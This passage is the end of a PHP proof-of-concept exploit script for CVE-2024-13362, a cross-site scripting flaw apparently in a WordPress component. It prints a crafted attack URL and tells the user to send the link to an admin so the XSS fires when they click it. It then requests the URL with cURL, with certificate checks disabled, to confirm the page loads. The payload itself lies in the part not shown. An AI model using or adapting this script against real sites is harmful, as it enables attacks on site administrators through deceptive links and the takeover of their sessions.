echo "[+] Atomic Edge CVE-2024-13362 PoC\n";
echo "[+] Target: $target_url\n";
echo "[+] Crafted URL: $attack_url\n\n";
echo "[+] Instructions: Send this link to an admin user. When they click it, the XSS will execute.\n";
echo "[+] Alternatively, open this URL in a browser where you are logged in as admin.\n\n";

// Use cURL to verify the page loads (optional)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $attack_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_test_cookie=WP+Cookie+check'); // Adjust for your session

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] HTTP Status: $http_code\n";
if ($http_code == 200) {
    echo "[+] Page loaded successfully. Check response body for XSS payload in output.\n";
} else {
    echo "[!] Failed to load page. The vulnerability may require authentication or a specific setup.\n";
}
?>
```
